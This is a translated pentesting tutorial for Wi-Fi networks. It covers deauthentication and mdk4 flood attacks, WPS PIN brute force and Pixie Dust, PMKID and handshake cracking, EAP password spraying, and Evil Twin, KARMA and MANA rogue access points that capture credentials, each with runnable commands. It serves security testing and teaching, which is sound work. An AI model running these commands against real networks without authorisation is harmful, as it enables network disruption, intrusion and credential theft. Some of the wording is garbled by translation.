Pentesting of Wi-Fi networks. From the basics to advanced attacks

14 March 2024 28 minutes Author: Cyber Witcher

This material is a comprehensive guide to Wi-Fi security testing, detailing various aspects and techniques pentesters can use to identify vulnerabilities in Wi-Fi networks.

Basic Wi-Fi commands

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis

Tools

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

Run airgeddon using docker

docker run \
          --rm \
          -ti \
          --name airgeddon \
          --net=host \
          --privileged \
          -p 3000:3000 \
          -v /tmp:/io \
          -e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
          v1s1t0r1sh3r3/airgeddon

З: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

It can perform Evil Twin, KARMA, and Known Beacons attacks and then use a phishing pattern to obtain a real network password or intercept social network credentials.

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

This tool automates WPS/WEP/WPA-PSK attacks. It automatically:

  • Switch the interface to monitor mode

  • Scan possible networks – and let you choose the victim(s)

  • If WEP – launch WEP attacks

  • If WPA-PSK

  • If WPS: Pixie dust attack and brute force attack (be careful, brute force attack can take a long time). Note that it does not try to enter a null PIN or a database generated PIN.

  • Try to get the PMKID from the hotspot to jailbreak it

  • Try deauthenticating the AP clients to capture the handshake

  • If PMKID or Handshake, try brute force using top5000 passwords.

Summary of attacks

DoS

  • Deauthenticate/disconnect – disconnect all (or specific ESSID/client)

  • Random fake access points – hide networks, scanners for possible failures

  • Overload AP – try to kill AP (usually not very helpful)

  • WIDS — Play with IDS

  • TKIP, EAPOL — Some specific attacks on some DoS access points

Cracking

  • Crack WEP (multiple tools and methods)

  • WPA-PSK WPS Pin (“Brute-Force” WPA PMKID [DoS +] WPA Handshake Capture + Hacking)

WPA-MGT

  • Username entry

  • Bruteforce credentials

Evil Twin (with or without DoS)

  • Open Evil Twin [+ DoS] – Useful for capturing portal credentials and/or performing attacks over a local network

  • WPA-PSK Evil Twin – Useful for network attacks if you know the password

  • WPA-MGT – useful for obtaining company credentials

DOS

Deauthentication packets. Description here

Deauthentication attacks, a common Wi-Fi hacking method, involve forging “control” frames to force devices to disconnect from the network. These unencrypted packets trick clients into believing they belong to a legitimate network, allowing attackers to harvest WPA protocols to compromise or permanently disrupt network connections. This tactic, disturbing in its simplicity, is widely used and has significant implications for network security.

Deauthentication with Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
  • -0 means deauthentication

  • 1 is the number of deaths to send (you can send multiple if you want); 0 means send them all the time

  • -a 00:14:6C:7E:40:80 MAC address of the access point

  • -c 00:0F:B5:34:30:30 — MAC address of the client for deauthentication; if omitted, broadcast deauthentication is sent (doesn’t always work)

  • ath0 is the name of the interface

Disconnection packages

Disconnect packets, similar to deauthentication packets, are a type of control frame used in Wi-Fi networks. These packets serve to break the connection between a device (such as a laptop or smartphone) and an access point (AP). The main difference between disconnection and deauthentication is in their usage scenarios. While an access point issues deauthentication packets to explicitly remove rogue devices from the network, disconnect packets are typically sent when the access point is shut down, restarted, or moved, requiring all connected nodes to be disconnected.

This attack can be performed using mdk4 (“d” mode):

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them 
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

More DOS attacks from mdk4​

ATTACK MODE b: Flood the lighthouse

Sends beacon frames to show fake access points to clients. Sometimes this can cause network scanners and even drivers to crash!

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: authentication, denial of service

Sending authentication frames to all available access points (APs) within range can overload these APs, especially when many clients are involved. This heavy traffic can lead to system instability, causing some access points to freeze or even reset.

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ATTACK MODE p: SSID probing and matching

Access Point (AP) Verification verifies that the SSID is properly detected and confirms the AP’s range. This technique, combined with matching hidden SSIDs with or without a wordlist, helps identify and access hidden networks.

ATTACK MODE m: Michael countermeasures Exploitation

Sending random or duplicate packets to different QoS queues can trigger Michael countermeasures on TKIP access points, causing the access point to shut down for one minute. This method is an effective DoS (Denial of Service) attack tactic.

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Start and Logoff Packet Injection

Flooding the access point with EAPOL Start frames creates fake sessions, overloading the access point and blocking legitimate clients. Additionally, implementing fake EAPOL logout messages force clients to disconnect, both methods effectively disrupting the network.

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: Attacks for IEEE 802.11s mesh networks

Various attacks on communication control and routing in mesh networks.

ATTACK MODE w: WIDS Confusion

Cross-connecting clients to multiple WDS nodes or spoofed access points can manipulate intrusion detection and prevention systems, creating confusion and potential abuse of the system.

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

ATTACK MODE f: Packet Fuzzer

A packet phaser that contains a variety of packet sources and a full set of packet manipulation modifiers.

Airggedon

Airgeddon offers most of the attacks suggested in previous comments:

WPS

WPS (Wi-Fi Protected Setup) simplifies the process of connecting devices to the router, increasing the speed and ease of setup for networks encrypted with WPA or WPA2 Personal. This is ineffective for WEP security, which is easy to crack. WPS uses an 8-digit two-half verified PIN, which makes it susceptible to brute-force attacks due to the limited number of combinations (11,000 possibilities).

WPS Bruteforce

There are 2 main tools to do this: Reaver and Bully.

  • Reaver was designed as a robust and practical attack against WPS, and has been tested against a wide range of access points and WPS implementations.

  • Bully is a new implementation of the WPS brute force attack written in C. It has several advantages over the original reaver code: fewer dependencies, improved memory and CPU performance, correct handling of byte order, and a more robust parameter set.

The attack exploits a WPS PIN vulnerability, specifically its disclosure of the role of the first four digits and the last digit as a checksum, which facilitates a brute-force attack. However, defenses against brute-force attacks, such as blocking MAC addresses from aggressive attackers, require MAC address rotation to continue the attack.

By obtaining the WPS PIN using tools such as Bully or Reaver, an attacker can determine the WPA/WPA2 PSK, providing permanent access to the network.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot    
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Smart brute force

This advanced approach targets WPS PINs using known vulnerabilities:

  • Pre-discovered PINs : Use a database of known PINs associated with specific manufacturers known to use unified WPS PINs. This database matches the first three octets of MAC addresses with possible PIN codes from these manufacturers.

  • PIN generation algorithms : Use algorithms like ComputePIN and EasyBox that calculate WPS PINs based on the access point’s MAC address. Arcadyan’s algorithm additionally requires a device ID, adding a layer to the PIN generation process.

WPS Pixie Dust Attack

Dominique Bongard discovered a flaw in some access points (APs) for generating secret codes known as nonces ( E-S1 and E-S2 ). If these nonces can be recognized, cracking the access point’s WPS PIN becomes easy. The AP exposes the PIN in a special code (hash) to confirm that it is legitimate and not a fake (fraudulent) AP. These nonces are essentially “keys” to unlock the “safe” that holds the WPS PIN. You can learn more about it here.

Simply put, the problem is that some access points did not use enough random keys to encrypt the PIN during the connection process. This makes the PIN vulnerable to guessing from outside the network (offline brute force attack).

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

Null Pin Attack

Some poorly designed systems even allow access with a null PIN (a blank or non-existent PIN), which is quite unusual. The Reaver tool is able to test for this vulnerability, unlike Bully.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

All proposed WPS attacks can be easily performed using airgeddon.

  • 5 and 6 allow you to try your own PIN code (if available)

  • 7 and 8 perform a Pixie Dust attack

  • 13 allows you to check for a NULL PIN

  • 11 and 12 will collect the PINs associated with the selected access point from the available databases and generate possible PINs using: ComputePIN, EasyBox and additionally Arcadyan (recommended, why not?)

  • 9 and 10 will check all possible PIN codes

WEP

So broken and unused today. Just be aware that airgeddon has a WEP option called “All in One” to attack this type of security. Other tools offer similar options.

WPA/WPA2 PSK

PMKID

In 2018, hashcat introduced a new attack method that is unique in that it requires only one packet and does not require any clients to connect to the target access point—only interaction between the attacker and the access point.

Many modern routers add an optional field to the first EAPOL frame during association, known as Robust Security Network. This includes PMKID.

As explained in the original post, the PMKID is generated using known data:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Given that “PMK Name” is constant, we know the BSSID of the access point and station, and it’s PMK is identical to the full 4-way handshake identifier, hashcat can use this information to crack the PSK and recover the passphrase!

To collect this information and verify the password locally, follow these steps:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1
#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

The stripped PMKID will be shown on the console and also stored in _ /tmp/attack.pcap _ Now convert the record to hashcat/john format and crack it:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Please note that the format of a valid hash contains 4 parts, such as:

4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 if yours contains only 3 parts, then it is invalid (PMKID entry is invalid).

Note that hcxdumptool will also remove the handshake (something like this will appear: MP:M1M2 RC:63258 EAPOLTIME:17091). You can convert the handshake to hashcat / john format using cap2hccapx

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

Noticing that some of the handshakes captured by this tool cannot be cracked even with the correct password. It is recommended to capture handshakes in the traditional way as well, if possible, or to capture several of them with this tool.

Shooting a handshake

An attack on WPA/WPA2 networks can be performed by intercepting the handshake and attempting to crack the password offline. This process involves monitoring the connection of a certain network and the BSSID on a certain channel. Here’s a quick guide:

  • Define the BSSID , channel and connected client of the target network.

  • Use airodump-ng to monitor network traffic on the specified channel and BSSID, hoping to capture the handshake. The command will look like this:

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
  • To increase the chance of capturing the handshake, immediately disconnect the client from the network to force reauthentication. This can be done using the aireplay-ng command, which sends deauthentication packets to the client:

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Note that after the client is deauthenticated, it could try to connect to a different access point or, in other cases, to a different network.

When airodump-ng shows the handshake information, it means that the handshake has been captured and you can stop listening:

Once the handshake is locked, you can crack it using aircrack-ng:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

WPA Enterprise (MGT)

In corporate WiFi setups, you’ll come across different authentication methods, each of which provides different levels of security and management features. When you use tools like airodump-ng to inspect network traffic, you may notice identifiers for these authentication types. Common methods include:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

EAP-GTC (Generalized Token Card) :

  • This method supports hardware tokens and one-time passwords in EAP-PEAP. Unlike MSCHAPv2, it does not use peer-to-peer challenge and sends passwords in clear text to the access point, making it vulnerable to downgrade attacks.

EAP-MD5 (message digest 5) :

  • Includes sending an MD5 hash of the password from the client. This is not recommended due to vulnerability to dictionary attacks, lack of server authentication, and inability to generate WEP keys for the session.

EAP-TLS (Transport Layer Security) :

  • Uses both client-side and server-side certificates for authentication and can dynamically generate WEP keys based on user and session to secure communications.

EAP-TTLS (Tunnel Transport Layer Security) :

  • Provides mutual authentication over an encrypted tunnel along with a per-user, per-session method of obtaining dynamic WEP keys. It only requires server-side certificates and clients use credentials.

PEAP (Protected Extensible Authentication Protocol) :

  • Functions similarly to EAP, creating a TLS tunnel for secure communication. This allows weaker authentication protocols to be used on top of EAP due to the protection offered by the tunnel.

  • PEAP-MSCHAPv2 : Often known as PEAP, it combines the vulnerable challenge/response mechanism of MSCHAPv2 with a secure TLS tunnel.

  • PEAP-EAP-TLS (or PEAP-TLS) : Similar to EAP-TLS, but initiates a TLS tunnel before exchanging certificates, offering an additional layer of security.

Username entry

From reading https://tools.ietf.org/html/rfc3748#page-27 , it seems that if you are using EAP, Identity messages should be supported and the username will be sent in the clear in the Response Identity. ” message.

Even using one of the most secure authentication methods: PEAP-EAP-TLS, it is possible to capture the username sent in the EAP protocol. To do this, intercept the authentication connection (start airodump-ng on the channel and wireshark on the same interface) and filter packets by eapol. Inside the “Response, Identification” package, the customer’s username will appear.

Anonymous persons

Identity hiding is supported by EAP-PEAP and EAP-TTLS. In the context of a Wi-Fi network, an EAP-Identity request is typically initiated by an access point (AP) during the association process. To ensure user anonymity, the response from the EAP client to the user’s device contains only the critical information needed by the originating RADIUS server to process the request. This concept is illustrated by the following scenarios:

EAP-Identity = anonymous

In this scenario, all users use the alias “anonymous” as their user ID. The originating RADIUS server functions as an EAP-PEAP or EAP-TTLS server, responsible for managing PEAP or TTLS on the server side. The internal (secure) authentication method is then handled locally or delegated to a remote (home) RADIUS server.

EAP-Identity = anonymous@realm_x

In this situation, users from different fields hide their identities by specifying their respective fields. This allows the originating RADIUS server to send EAP-PEAP or EAP-TTLS requests to RADIUS servers in their home realms that act as PEAP or TTLS servers. The originating RADIUS server acts solely as a RADIUS relay node.

Alternatively, the originating RADIUS server can function as an EAP-PEAP or EAP-TTLS server and either handle the secure authentication method or forward it to another server. This option makes it easier to configure separate policies for different domains.

In EAP-PEAP, after establishing a TLS tunnel between the PEAP server and the PEAP client, the PEAP server initiates an EAP-Identity request and transmits it over the TLS tunnel. The client responds to this second EAP-Identity request by sending an EAP-Identity response containing the user’s true identity over the encrypted tunnel. This approach effectively prevents the user’s true identity from being revealed to anyone eavesdropping on 802.11 traffic.

EAP-TTLS follows a slightly different procedure. With EAP-TTLS, the client is typically authenticated using PAP or CHAP secured by a TLS tunnel. In this case, the client includes the User-Name attribute and the Password or CHAP-Password attribute in the initial TLS message sent after the tunnel is established.

Regardless of the chosen protocol, the PEAP/TTLS server obtains information about the user’s true identity after establishing a TLS tunnel. The real person can be represented as user@realm or simply user. If the PEAP/TTLS server is also responsible for user authentication, it now owns the user identity and continues to use the authentication method protected by the TLS tunnel. Alternatively, the PEAP/TTLS server can forward a new RADIUS request to the user’s home RADIUS server. This new RADIUS request is missing the PEAP or TTLS protocol layer. In cases where the secure authentication method is EAP, internal EAP messages are sent to the home RADIUS server without an EAP-PEAP or EAP-TTLS shell. The User-Name attribute of the outgoing RADIUS message contains the real user identity, replacing the anonymous User-Name from the incoming RADIUS request. If the secure authentication method is PAP or CHAP (only TTLS is supported), the username and other authentication attributes derived from the TLS payload are replaced in the outgoing RADIUS message, replacing the User-Name and TTLS EAP-Message anonymous attributes found. in the incoming RADIUS request.

EAP-Bruteforce (password cracker)

If the client is expected to use a username and password (note that EAP-TLS will not be valid in this case), then you can try to get a list of usernames (see next section) and passwords and try to brute force access using pneumatic hammer

./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

You can also perform this attack with eaphammer:

./eaphammer --eap-spray \
    --interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
    --essid example-wifi \
    --password bananas \
    --user-list users.txt

Theory of client attacks

Network selection and roaming

  • The 802.11 protocol defines how a station joins an extended service set (ESS), but does not specify criteria for selecting an ESS or an access point (AP) within it.

  • Stations can move between access points that share the same ESSID while maintaining communication between buildings or areas.

  • The protocol requires station authentication for the ESS, but does not require AP authentication for the station.

Preferred Network Lists (PNL)

  • Stations store the ESSID of each wireless network they connect to in their Preferred Network List (PNL), along with network configuration details.

  • PNL is used to automatically connect to known networks, improving the user experience by optimizing the connection process.

Passive scanning

  • Access points periodically broadcast beacon frames announcing their presence and capabilities, including the access point’s ESSID, unless broadcasting is disabled.

  • During passive scanning, stations listen to beacon frames. If the beacon’s ESSID matches the station’s PNL entry, the station can automatically connect to that access point.

  • Knowing a device’s PNL allows it to potentially be exploited by impersonating a known network ESSID, tricking the device into connecting to a rogue access point.

Active sensing

  • Active probing involves stations sending probing requests to discover nearby access points and their characteristics.

  • Directed probe requests target a specific ESSID, helping to determine whether a particular network is within range, even if it is a hidden network.

  • Broadcast probe requests have a null SSID field and are sent to all nearby access points, allowing the station to probe any desired network without revealing its PNL content.

A simple access point with redirection to the Internet

Before explaining how to perform more sophisticated attacks, we’ll explain how to simply create an access point and redirect its traffic to an interface connected to the Internet.

Use ifconfig -a to check for a WLAN interface to create an access point and an interface connected to the Internet.

DHCP і DNS

apt-get install dnsmasq #Manages DHCP and DNS

Create a configuration file /etc/dnsmasq.conf:

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Then set the IP addresses and routes:

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

And then run dnsmasq:

dnsmasq -C dnsmasq.conf -d

hostapd

apt-get install hostapd

Create the hostapd.conf configuration file:

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

Stop annoying processes, set monitor mode and run hostapd:

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

Forwarding and Forwarding

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Evil twin

A malicious double attack exploits the way in which WiFi clients recognize networks, primarily relying on the network name (ESSID), without requiring the base station (access point) to authenticate to the client.

Key points:

  • Difficulty Differentiating : Devices have difficulty distinguishing between legitimate and rogue access points when they share the same ESSID and encryption type. Real-world networks often use multiple access points with the same ESSID to seamlessly extend coverage.

  • Client roaming and connection manipulation : The 802.11 protocol allows devices to roam between access points in the same ESS. Attackers can take advantage of this by tricking the device into disconnecting from its current base station and connecting to a rogue one. This can be achieved by offering a stronger signal or disrupting the connection to a legitimate access point using methods such as deauthentication packets or jamming.

  • Challenges in Execution : Successfully executing a malicious double attack in environments with multiple well-placed access points can be challenging. Deauthentication of one legitimate access point often results in the device connecting to another legitimate access point unless the attacker can deauthenticate all nearby access points or strategically place the rogue access point.

You can create a very simple Open Evil Twin (without the ability to route traffic to the Internet) by doing:

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

You can also create an Evil Twin with eaphammer (note that the interface must NOT be in monitor mode to create evil twins with eaphammer):

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

Or with help Airgeddon:Options: 5,6,7,8,9 (inside Evil Twin attack menu).

Note that by default, if the ESSID in PNL is saved as WPA secured, the device will not automatically connect to Open evil Twin. You can try to DoS the real access point and hope that the user will manually connect to your Open Evil Twin, or you can DoS the real access point by using WPA Evil Twin to capture the handshake (using this method you will not be able to allow the victim to connect to you , since you don’t know the PSK, but you can capture the handshake and try to crack it). Some OS and AV will warn the user that connecting to an open network is dangerous…

WPA/WPA2 Evil Twin

You can create an Evil Twin using WPA/2 , and if devices are configured to connect to that SSID using WPA/2, they will try to connect. In any case, to complete the 4-way handshake, you also need to know the password that the client will use. If you do not know this, the connection will not be completed.

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

Debugging PEAP and EAP-TTLS TLS tunnels in Evil Twins attacks

This method is tested on a PEAP connection, but since I’m decrypting an arbitrary TLS tunnel, it should also work with EAP-TTLS

Inside the hostapd -wpe configuration, comment out the line containing dh_file (from dh_file=/etc/hostapd-wpe/certs/dh) #dh_file=/etc/hostapd-wpe/certs/dh. This will allow hostapd-wpe to exchange keys using RSA instead of DH, so you can decrypt traffic later knowing the server’s private key.

Now run Evil Twin using hostapd-wpe with this modified configuration as usual. Also run the wireshark interface that performs the Evil Twin attack.

Now or later (when you have already captured some authentication intents) you can add the RSA private key to wireshark in:Edit –> Preferences –> Protocols –> TLS –> (RSA keys list) Edit…

Add a new entry and fill the form with the following values: IP address = any — Port = 0 — Protocol = data — Key file ( select a key file to avoid problems, select a key file without password protection ).

And look at the new “Decrypted TLS” tab :

Attack KARMA, MANA, Loud MANA and famous beacons

ESSID and MAC black/white lists

The different types of Media Access Control Filter Lists (MFACLs) and their respective modes and effects on rogue access point (AP) behavior:

MAC based whitelist :

The malicious AP will only respond to probe requests from whitelisted devices, remaining invisible to all others not on the list.

Blacklist based on MAC :

The rogue access point will ignore probe requests from blacklisted devices, effectively making the rogue access point invisible to those specific devices.

Whitelist based on SSID :

A rogue access point will only respond to probe requests for certain listed ESSIDs, making it invisible to devices whose Priority Network Lists (PNLs) do not contain those ESSIDs.

Blacklist based on SSID :

A rogue access point will not respond to requests for specific blacklisted ESSIDs, making it invisible to devices looking for those specific networks.

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]
# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

KARMA

This method allows an attacker to create a malicious access point (AP) that responds to all test requests from devices seeking to connect to the network. This technique tricks devices into connecting to an attacker’s access point by impersonating the networks the devices are looking for. When a device sends a connection request to this rogue access point, it terminates the connection, causing the device to mistakenly connect to the attacker’s network.

DELUSION

Devices then began to ignore unwanted network responses, reducing the effectiveness of Karma’s initial attack. However, a new method known as the MANA attack was introduced by Jan de Villiers and Dominic White. This method involves the rogue access point collecting Preferred Network Lists (PNLs) from devices by responding to their broadcast test requests with network names (SSIDs) previously requested by the devices. This sophisticated attack bypasses defenses against the original Karma attack by exploiting the way devices remember and prioritize known networks.

The MANA attack works by monitoring both directed and broadcast probe requests from devices. For directed requests, it records the MAC address of the device and the requested network name, adding this information to the list. When a broadcast request is received, the access point responds with information matching any of the networks in the device’s list, prompting the device to connect to the rogue access point.

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

Loud MANA

Loud MANA attack is an advanced strategy when devices do not use directional probing or when their Preferred Network Lists (PNLs) are unknown to the attacker. It works on the principle that devices in the same zone are likely to share network names in their PNLs. Instead of responding selectively, this attack broadcasts probe responses for each network name (ESSID) found in the combined PNLs of all monitored devices. This broad approach makes it more likely that the device will recognize a known network and attempt to connect to a rogue access point (AP).

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

Beacon attack is known

When a Loud MANA attack might not be enough, a Known Beacon attack presents another approach. This method matches the connection process by simulating an access point that responds to any network name by iterating through a list of potential ESSIDs obtained from a list of words. This simulates the presence of multiple networks, hoping to match the ESSID in the victim’s PNL, prompting a connection attempt to the spoofed access point. The attack can be enhanced by combining it with the –loud option to more aggressively attempt to capture devices.

Eaphammer implemented this attack as a MANA attack where all ESSIDs in the list are charged (you can also combine this with –loud to create a Loud MANA + Known beacons attack):

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

The famous Beacon Burst attack

The Known Beacon Burst attack involves a rapid broadcast of beacon frames for each ESSID specified in the . This creates a dense environment of fake networks, which greatly increases the likelihood of devices connecting to a rogue access point, especially when combined with a MANA attack. This technique uses speed and volume to overload the devices’ network selection mechanisms.

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
 --bssid de:ad:be:ef:13:37 \
 --known-essids-file known-s.txt \
 --dst-addr 11:22:33:11:22:33 \
 --burst-count 5

Wi-Fi Direct

Wi-Fi Direct is a protocol that allows devices to connect directly to each other using Wi-Fi without using a traditional wireless access point. This capability is integrated into various Internet of Things (IoT) devices such as printers and TVs, facilitating direct communication between devices. A notable feature of Wi-Fi Direct is that one device assumes the role of an access point, known as the group owner, to manage the connection.

Wi-Fi Direct connections are secured using Wi-Fi Protected Setup (WPS), which supports several secure pairing methods, including:

  • Push Button Configuration (PBC)

  • PIN code entry

  • Near Field Communication (NFC)

These methods, particularly PIN entry, are susceptible to the same vulnerabilities as WPS in traditional Wi-Fi networks, making them targets for similar attack vectors.

EvilDirect Hijacking

EvilDirect Hijacking is an attack specific to Wi-Fi Direct. It mirrors the Evil Twin attack concept, but targets Wi-Fi Direct connections. In this scenario, an attacker impersonates the legitimate owner of the group in order to trick devices into connecting to the malicious entity. This method can be performed using tools such as airbase-ng by specifying the channel, ESSID, and MAC address of the simulated device.

Other related articles
Found an error?
If you find an error, take a screenshot and send it to the bot.